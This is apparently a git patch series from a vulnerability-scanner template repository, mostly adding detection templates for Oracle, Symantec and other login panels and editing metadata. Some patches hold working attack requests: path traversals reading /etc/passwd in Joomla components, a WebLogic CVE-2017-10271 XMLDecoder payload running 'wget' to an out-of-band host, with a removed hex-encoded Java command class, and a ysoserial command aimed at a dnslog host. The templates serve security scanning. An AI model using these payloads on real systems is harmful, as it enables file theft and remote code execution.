"myvuehelp-favicon" dsl: - - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" + - 'status_code==200 && (1c4b2c10acccc48852d12eddadaf7944" == md5(body))' \ No newline at end of file From 217840fe993f61e5bacefe89357fa26bde05061c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:27:48 +0530 Subject: [PATCH 150/339] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index 989eceab43..5a7c50f69d 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml @@ -5,7 +5,7 @@ info: author: philippedelteil severity: info description: This template will detect a running CARESTREAM Vue Motion instance - references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + reference: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf tags: tech,myvuehelp requests: From 9aa0acb8d2e2c74971216c935ac76f7b28bd7966 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:34:40 +0530 Subject: [PATCH 151/339] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index 5a7c50f69d..b7ce069ac1 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml @@ -22,9 +22,9 @@ requests: - type: dsl name: "myvuehelp" dsl: - - 'status_code==200 && ("84054196570ecd7526894ccb6e7c5c6e" == md5(body))' + - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" - type: dsl name: "myvuehelp-favicon" dsl: - - 'status_code==200 && (1c4b2c10acccc48852d12eddadaf7944" == md5(body))' \ No newline at end of file + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" \ No newline at end of file From a6d61cd622c3c280b46b46418d9c5edb124be33a Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 13:53:26 +0530 Subject: [PATCH 152/339] workflow update --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 754b772885..ecad02f49f 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -1,7 +1,7 @@ name: ✍🏻 CVE Annotate on: - pull_request: + push: branches: - master workflow_dispatch: From 6bd323aae1d3d23932be739745f751e6921f248c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 11 Sep 2021 08:45:52 +0000 Subject: [PATCH 153/339] Auto Generated CVE annotations [Sat Sep 11 08:45:52 UTC 2021] :robot: --- cves/2011/CVE-2011-2780.yaml | 12 ++++++++++++ cves/2015/CVE-2015-7450.yaml | 5 +++++ 2 files changed, 17 insertions(+) diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml index d57a2e90e1..1cb0a0ac54 100644 --- a/cves/2011/CVE-2011-2780.yaml +++ b/cves/2011/CVE-2011-2780.yaml @@ -5,6 +5,18 @@ info: author: daffainfo severity: high tags: cve,cve2011,lfi,chyrp + description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744." + reference: + - http://www.justanotherhacker.com/advisories/JAHx113.txt + - http://www.openwall.com/lists/oss-security/2011/07/13/5 + - http://www.ocert.org/advisories/ocert-2011-001.html + - http://www.openwall.com/lists/oss-security/2011/07/13/6 + - http://www.securityfocus.com/bid/48672 + - http://secunia.com/advisories/45184 + - http://osvdb.org/73891 + - http://securityreason.com/securityalert/8312 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 + - http://www.securityfocus.com/archive/1/518890/100/0/threaded requests: - method: GET diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index e27a3e815f..04918de4f0 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -10,6 +10,11 @@ info: - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 tags: cve,cve2015,websphere,deserialization,rce,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2015-7450 + cwe-id: CWE-94 requests: - raw: From 8cbd12af606195512be5a646c9e422795d05165e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 11 Sep 2021 20:50:49 +0530 Subject: [PATCH 154/339] Add files via upload --- technologies/oracle-dbcs.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/oracle-dbcs.yaml diff --git a/technologies/oracle-dbcs.yaml b/technologies/oracle-dbcs.yaml new file mode 100644 index 0000000000..d1c8891335 --- /dev/null +++ b/technologies/oracle-dbcs.yaml @@ -0,0 +1,19 @@ +id: oracle-database-service +info: + name: Oracle Database as a Service + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 + tags: oracle,tech +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - '<title>Oracle Database as a Service' + - type: status + status: + - 200 \ No newline at end of file From 207c140c504264803a0a4d2fd8776bc289e25508 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 11 Sep 2021 21:06:36 +0530 Subject: [PATCH 155/339] moving files around --- .../other/karel-ip-phone-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename karel-ip-phone-lfi.yaml => vulnerabilities/other/karel-ip-phone-lfi.yaml (100%) diff --git a/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml similarity index 100% rename from karel-ip-phone-lfi.yaml rename to vulnerabilities/other/karel-ip-phone-lfi.yaml From acbe5973922109a2506b91ca8b31eb0519b55c2f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 11 Sep 2021 21:11:23 +0530 Subject: [PATCH 156/339] Add files via upload --- technologies/oracle-dbass-detect.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 technologies/oracle-dbass-detect.yaml diff --git a/technologies/oracle-dbass-detect.yaml b/technologies/oracle-dbass-detect.yaml new file mode 100644 index 0000000000..2c6406bb5d --- /dev/null +++ b/technologies/oracle-dbass-detect.yaml @@ -0,0 +1,18 @@ +id: oracle-DBaaS Monitor-service +info: + name: DBaaS Monitor Detect + author: pussycat0x + severity: info + tags: oracle,tech +requests: + - method: GET + path: + - '{{BaseURL}}/dbaas_monitor/login' + matchers-condition: and + matchers: + - type: word + words: + - 'DBaaS Monitor' + - type: status + status: + - 200 \ No newline at end of file From 50e9ff0839d5f6d5401074c1d05f29915ccdad67 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 11 Sep 2021 21:12:06 +0530 Subject: [PATCH 157/339] Create oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 24 +++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/oracle-business-control.yaml diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml new file mode 100644 index 0000000000..04d90cc407 --- /dev/null +++ b/exposed-panels/oracle-business-control.yaml @@ -0,0 +1,24 @@ +id: oracle-business-control + +info: + name: Oracle Commerce Business Control Center + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 + +requests: + - method: GET + path: + - '{{BaseURL}}/atg/bcc' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle Commerce Business Control Center' + + - type: status + status: + - 200 From eec52d721480f8be50037d7160185e58a4a10d11 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 11 Sep 2021 21:20:57 +0530 Subject: [PATCH 158/339] Create oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/oracle-integrated-manager.yaml diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml new file mode 100644 index 0000000000..8a61b0ea64 --- /dev/null +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -0,0 +1,24 @@ +id: oracle-integrated-manager + +info: + name: Oracle(R) Integrated Lights Out Manager + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + +requests: + - method: GET + path: + - '{{BaseURL}}/iPages/i_login.asp' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle(R) Integrated Lights Out Manager - Login' + + - type: status + status: + - 200 From 1f40ec24c5bc6ff1e61494fdb1d9891f15e30e8d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 11 Sep 2021 21:50:06 +0530 Subject: [PATCH 159/339] Create oracle-people-enterprise.yaml --- exposed-panels/oracle-people-enterprise.yaml | 26 ++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/oracle-people-enterprise.yaml diff --git a/exposed-panels/oracle-people-enterprise.yaml b/exposed-panels/oracle-people-enterprise.yaml new file mode 100644 index 0000000000..eba64c8a2a --- /dev/null +++ b/exposed-panels/oracle-people-enterprise.yaml @@ -0,0 +1,26 @@ +id: oracle-people-enterprise + +info: + name: Oracle Peoplesoft Enterprise + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "/signon.html" + - " Date: Sun, 12 Sep 2021 05:10:08 +0700 Subject: [PATCH 161/339] Create CVE-2010-2037.yaml --- cves/2010/CVE-2010-2037.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2037.yaml diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml new file mode 100644 index 0000000000..9a9b24c3e6 --- /dev/null +++ b/cves/2010/CVE-2010-2037.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2037 + +info: + name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34005 + - https://www.cvedetails.com/cve/CVE-2010-2037 + tags: cve,cve2010,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 81ea9540f2e645250a5e4ee9e31e395391eeb326 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 12 Sep 2021 06:18:29 +0700 Subject: [PATCH 162/339] Create CVE-2010-1723.yaml --- cves/2010/CVE-2010-1723.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1723.yaml diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml new file mode 100644 index 0000000000..4b5060444b --- /dev/null +++ b/cves/2010/CVE-2010-1723.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1723 + +info: + name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12289 + - https://www.cvedetails.com/cve/CVE-2010-1723 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f0a500cf976af1720f0d79d071ad12a325a9919d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 11 Sep 2021 22:14:16 -0300 Subject: [PATCH 163/339] Create symantec-ewep.yaml --- exposed-panels/symantec-ewep.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/symantec-ewep.yaml diff --git a/exposed-panels/symantec-ewep.yaml b/exposed-panels/symantec-ewep.yaml new file mode 100644 index 0000000000..6891d66808 --- /dev/null +++ b/exposed-panels/symantec-ewep.yaml @@ -0,0 +1,22 @@ +id: symantec-ewep + +info: + name: Detect Symantec Encryption Web Email Protection + author: johnk3r + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/b/l.e" + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Corporation. All Rights Reserved" + part: body + - type: status + status: + - 200 From 896343be128678e07d0c2166d7444d906a0f4f55 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:41:33 +0300 Subject: [PATCH 164/339] Clarify description --- vulnerabilities/oscommerce/oscommerce-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index 5f888337fc..f359c42b11 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -3,7 +3,7 @@ id: oscommerce-rce info: author: Suman_Kar name: osCommerce 2.3.4.1 - Remote Code Execution - description: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php + description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the command's executed output reference: https://www.exploit-db.com/exploits/50128 severity: high tags: rce,oscommerce From 624162cca79ad4aa06f205869262c44e9633c30a Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:50:53 +0300 Subject: [PATCH 165/339] Working reference --- vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index c0918d72c5..958241da6b 100644 --- a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability - reference: https://www.securityfocus.com/bid/54326/info + reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 tags: wordpress,xss,wp-plugin requests: From fb2f89bc867e272a0eb77331ef73c891ae1969d0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:58:43 +0300 Subject: [PATCH 166/339] References --- vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index 7075c485bf..dfb6f028d4 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -5,6 +5,9 @@ info: author: madrobot severity: high tags: wordpress,rce,ssrf + reference: + - https://www.exploit-db.com/exploits/49327 + - https://wpscan.com/vulnerability/10417 requests: - raw: From e602575ae0cc3fd849742cdf401f709050d3e616 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:58:48 +0300 Subject: [PATCH 167/339] Working reference --- vulnerabilities/wordpress/wp-church-admin-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml index f5c5957b97..089b607075 100644 --- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml +++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml @@ -4,7 +4,7 @@ info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/54329/info + reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin requests: From 59525a5846f37fd5eca99aff887d5db16abd564a Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 13:02:41 +0300 Subject: [PATCH 168/339] Working reference --- vulnerabilities/wordpress/wp-finder-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-finder-xss.yaml b/vulnerabilities/wordpress/wp-finder-xss.yaml index 1bbd46235e..d9dd3851bf 100644 --- a/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -4,7 +4,7 @@ info: name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/55217/info + reference: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin requests: From 46b16bcfa2960e2d80e4bd22c2c00a4e6d324017 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 14:16:01 +0300 Subject: [PATCH 169/339] Incomplete title --- vulnerabilities/wordpress/wp-super-forms.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-super-forms.yaml b/vulnerabilities/wordpress/wp-super-forms.yaml index 7b1c01e7ad..1d3a407ad9 100644 --- a/vulnerabilities/wordpress/wp-super-forms.yaml +++ b/vulnerabilities/wordpress/wp-super-forms.yaml @@ -1,6 +1,6 @@ id: wordpress-super-forms info: - name: WordPress super-forms + name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. From 34bba4e794f0251dc84cf0670e6c7e585c27ea81 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:10:52 +0530 Subject: [PATCH 170/339] misc update --- cves/2019/CVE-2019-14470.yaml | 1 - cves/2021/CVE-2021-26295.yaml | 6 ++---- vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml | 2 +- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 82fc91e2cf..d956d7190a 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -4,7 +4,6 @@ info: name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter. reference: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index ab08b76304..42481137f2 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -9,15 +9,13 @@ info: - https://github.com/yumusb/CVE-2021-26295-POC - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E - -# Note:- This is detection template, To perform deserializes do as below -# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot -# `cat mad.ot | hex` and replace in along with the url in std-String value classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-26295 cwe-id: CWE-502 + additional-fileds: + ysoserial-payload: 'java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex' requests: - raw: diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index dfb6f028d4..4fe1fb2f7a 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: high tags: wordpress,rce,ssrf - reference: + reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 From 162928ed27111f31c14fc011c730e4f503a238c0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:16:47 +0530 Subject: [PATCH 171/339] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 42481137f2..fa1a549e53 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.80 cve-id: CVE-2021-26295 cwe-id: CWE-502 - additional-fileds: + additional-fields: ysoserial-payload: 'java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex' requests: From 3eb7e213a7d6a7fdef5bcf2cbbb016c6706ba6c6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:22:25 +0530 Subject: [PATCH 172/339] Update symantec-ewep.yaml --- exposed-panels/symantec-ewep.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/symantec-ewep.yaml b/exposed-panels/symantec-ewep.yaml index 6891d66808..517d468a5c 100644 --- a/exposed-panels/symantec-ewep.yaml +++ b/exposed-panels/symantec-ewep.yaml @@ -17,6 +17,7 @@ requests: words: - "Symantec Corporation. All Rights Reserved" part: body + - type: status status: - 200 From 11ae38bd01984b5696ac58d21df28356174fde3a Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Sun, 12 Sep 2021 15:45:30 +0300 Subject: [PATCH 173/339] #2636, Add the takeover tag to the template The template indicates a possible subdomain takeover vulnerability, therefore it should have the takeover tag. --- dns/servfail-refused-hosts.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index 99fabbc4f5..21722ac4c7 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -4,7 +4,7 @@ info: name: Servfail Host Finder author: pdteam severity: info - tags: dns + tags: dns,takeover dns: - name: "{{FQDN}}" From e6d97e26c5e9223090763b3dabc272501f0e9aeb Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 18:31:46 +0530 Subject: [PATCH 174/339] additional matcher --- cves/2020/CVE-2020-2551.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index 348fd0ba52..47f08247f8 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -28,6 +28,7 @@ requests: - method: GET path: - "{{BaseURL}}/console/login/LoginForm.jsp" + matchers-condition: and matchers: - type: word @@ -38,6 +39,12 @@ requests: - "12.2.1.4" condition: or part: body + + - type: word + words: + - "WebLogic" + part: body + - type: status status: - 200 From 0436e97c0e41503b2e573c84609f677b364400ef Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 18:32:24 +0530 Subject: [PATCH 175/339] payload update to work on both platform --- cves/2017/CVE-2017-10271.yaml | 54 ++++++++++++++--------------------- 1 file changed, 21 insertions(+), 33 deletions(-) diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 1e9b5d37af..16be3163ce 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - tags: cve,cve2017,rce,oracle,weblogic + tags: cve,cve2017,rce,oracle,weblogic,oob classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.50 @@ -24,37 +24,25 @@ requests: Content-Type: text/xml - + - - - - 0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034 - - - - com.supeream.exploits.XmlExp - - - - cat /etc/passwd - + + + + + + /bin/bash - - - - - - - - - - - - + + -c - - + + wget {{interactsh-url}} + + + @@ -62,7 +50,7 @@ requests: matchers: - - type: regex - regex: - - 'root:.*:0:0' - part: body + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 4337232f6e1969bebf85ad2c6519990fef3479e6 Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Sun, 12 Sep 2021 17:14:20 +0300 